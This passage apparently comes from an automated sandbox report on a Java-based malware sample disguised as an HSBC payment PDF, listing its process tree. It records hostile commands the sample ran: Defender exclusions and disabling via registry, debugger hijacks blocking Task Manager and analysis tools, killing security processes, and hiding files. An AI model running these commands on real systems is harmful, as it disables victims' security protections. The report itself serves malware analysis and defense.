of 4664 4648 cmd.exe 354 PID 4648 wrote to memory of 4664 4648 cmd.exe 354 PID 2884 wrote to memory of 4896 2884 java.exe 355 PID 2884 wrote to memory of 4896 2884 java.exe 355 PID 4896 wrote to memory of 4612 4896 cmd.exe 357 PID 4896 wrote to memory of 4612 4896 cmd.exe 357 PID 4896 wrote to memory of 4532 4896 cmd.exe 358 PID 4896 wrote to memory of 4532 4896 cmd.exe 358 PID 2884 wrote to memory of 3876 2884 java.exe 359 PID 2884 wrote to memory of 3876 2884 java.exe 359 PID 2884 wrote to memory of 4888 2884 java.exe 361 PID 2884 wrote to memory of 4888 2884 java.exe 361 PID 3876 wrote to memory of 4900 3876 cmd.exe 363 PID 3876 wrote to memory of 4900 3876 cmd.exe 363 PID 3876 wrote to memory of 3612 3876 cmd.exe 364 PID 3876 wrote to memory of 3612 3876 cmd.exe 364 PID 2884 wrote to memory of 4584 2884 java.exe 365 PID 2884 wrote to memory of 4584 2884 java.exe 365 PID 4584 wrote to memory of 4520 4584 cmd.exe 367 PID 4584 wrote to memory of 4520 4584 cmd.exe 367 PID 4584 wrote to memory of 4544 4584 cmd.exe 368 PID 4584 wrote to memory of 4544 4584 cmd.exe 368 PID 2884 wrote to memory of 4700 2884 java.exe 369 PID 2884 wrote to memory of 4700 2884 java.exe 369 PID 4700 wrote to memory of 1520 4700 cmd.exe 371 PID 4700 wrote to memory of 1520 4700 cmd.exe 371 PID 4700 wrote to memory of 1936 4700 cmd.exe 372 PID 4700 wrote to memory of 1936 4700 cmd.exe 372 PID 2884 wrote to memory of 4216 2884 java.exe 373 PID 2884 wrote to memory of 4216 2884 java.exe 373 PID 2884 wrote to memory of 4288 2884 java.exe 375 PID 2884 wrote to memory of 4288 2884 java.exe 375 PID 2884 wrote to memory of 1060 2884 java.exe 377 PID 2884 wrote to memory of 1060 2884 java.exe 377 PID 2884 wrote to memory of 4684 2884 java.exe 379 PID 2884 wrote to memory of 4684 2884 java.exe 379 PID 2884 wrote to memory of 5028 2884 java.exe 381 PID 2884 wrote to memory of 5028 2884 java.exe 381 PID 2884 wrote to memory of 4752 2884 java.exe 383 PID 2884 wrote to memory of 4752 2884 java.exe 383 PID 2884 wrote to memory of 4744 2884 java.exe 385 PID 2884 wrote to memory of 4744 2884 java.exe 385 PID 2884 wrote to memory of 4416 2884 java.exe 387 PID 2884 wrote to memory of 4416 2884 java.exe 387 PID 2884 wrote to memory of 616 2884 java.exe 389 PID 2884 wrote to memory of 616 2884 java.exe 389 -
Views/modifies file attributes 1 TTPs 8 IoCs
pid Process 1072 attrib.exe 2628 attrib.exe 3796 attrib.exe 3044 attrib.exe 3900 attrib.exe 852 attrib.exe 900 attrib.exe 492 attrib.exe
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\Payment Advice Hsbc_pdf.jar"1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3932
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3596 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4004
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1936 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4000
-
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +h C:\Users\Admin\Oracle2⤵
- Views/modifies file attributes
PID:3044
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +h +r +s C:\Users\Admin\.ntusernt.ini2⤵
- Views/modifies file attributes
PID:3900
-
-
C:\Windows\SYSTEM32\attrib.exeattrib -s -r C:\Users\Admin\ujTBR\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:852
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +s +r C:\Users\Admin\ujTBR\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:900
-
-
C:\Windows\SYSTEM32\attrib.exeattrib -s -r C:\Users\Admin\ujTBR2⤵
- Views/modifies file attributes
PID:492
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +s +r C:\Users\Admin\ujTBR2⤵
- Views/modifies file attributes
PID:1072
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +h C:\Users\Admin\ujTBR2⤵
- Views/modifies file attributes
PID:2628
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +h +s +r C:\Users\Admin\ujTBR\NXtxm.class2⤵
- Views/modifies file attributes
PID:3796
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3040 -
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:3996
-
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:4384
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\ujTBR','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\ujTBR\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3488
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f2⤵PID:1584
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F2⤵
- Kills process with taskkill
PID:3612
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2572
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2028
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f2⤵PID:2416
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:3916
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f2⤵PID:1324
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f2⤵PID:3572
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:3588
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:3708
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f2⤵PID:1540
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2840
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f2⤵PID:1908
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f2⤵PID:1060
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:808
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F2⤵
- Kills process with taskkill
PID:3864
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f2⤵PID:972
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:3380
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f2⤵PID:3252
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2292
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:4144
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:4168
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:4292
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:4304
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:4412
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:4432
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F2⤵
- Kills process with taskkill
PID:4460
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:4592
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:4612
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:4660
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4700
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:643⤵PID:5076
-
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:323⤵PID:5100
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:4724
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:4804
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:4876
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:4924
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:4972
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
PID:3128
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3736
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:2416
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:1552
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4160
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:643⤵PID:1060
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:323⤵PID:808
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:1404
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:643⤵PID:4164
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:323⤵PID:2292
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F2⤵
- Kills process with taskkill
PID:2656
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4312
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:643⤵PID:4236
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:323⤵PID:4220
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4284
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:643⤵PID:4004
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:323⤵PID:4424
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4472
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:643⤵PID:4304
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:323⤵PID:4352
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4320
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:643⤵PID:3792
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:323⤵PID:3800
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4384
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:643⤵PID:4604
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:323⤵PID:4668
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4576
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:643⤵PID:4852
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:323⤵PID:4896
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F2⤵
- Kills process with taskkill
PID:4672
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4840
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:643⤵PID:4916
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:323⤵PID:4612
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4592
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:643⤵PID:5012
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:323⤵PID:4964
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:5028
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:643⤵PID:4828
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:323⤵PID:3552
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4804
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:643⤵PID:4900
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:323⤵PID:4984
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4868
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:643⤵PID:5068
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:323⤵PID:5020
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4820
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:643⤵PID:4460
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:323⤵PID:2752
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F2⤵
- Kills process with taskkill
PID:4544
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3880
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:643⤵PID:936
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:323⤵PID:1552
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3884
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:643⤵PID:804
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:323⤵PID:3040
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:1180
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:643⤵PID:1444
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:323⤵PID:972
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4264
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:643⤵PID:4200
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:323⤵PID:3708
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4252
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:643⤵PID:4204
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:323⤵PID:3996
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:996
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:643⤵PID:4400
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:323⤵PID:720
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3932
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:643⤵PID:4528
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:323⤵PID:2168
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:1992
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3788
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:643⤵PID:4476
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:323⤵PID:4604
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4484
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:643⤵PID:4832
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:323⤵PID:4116
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4916
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:643⤵PID:4532
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:323⤵PID:4844
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4748
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:643⤵PID:4964
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:323⤵PID:3908
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4948
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:643⤵PID:5004
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:323⤵PID:4984
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:5064
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:643⤵PID:4464
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:323⤵PID:5104
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:5100
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:643⤵PID:2660
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:323⤵PID:852
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:2840
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:643⤵PID:3776
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:323⤵PID:3040
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F2⤵
- Kills process with taskkill
PID:1012
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3900
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:643⤵PID:4356
-
-
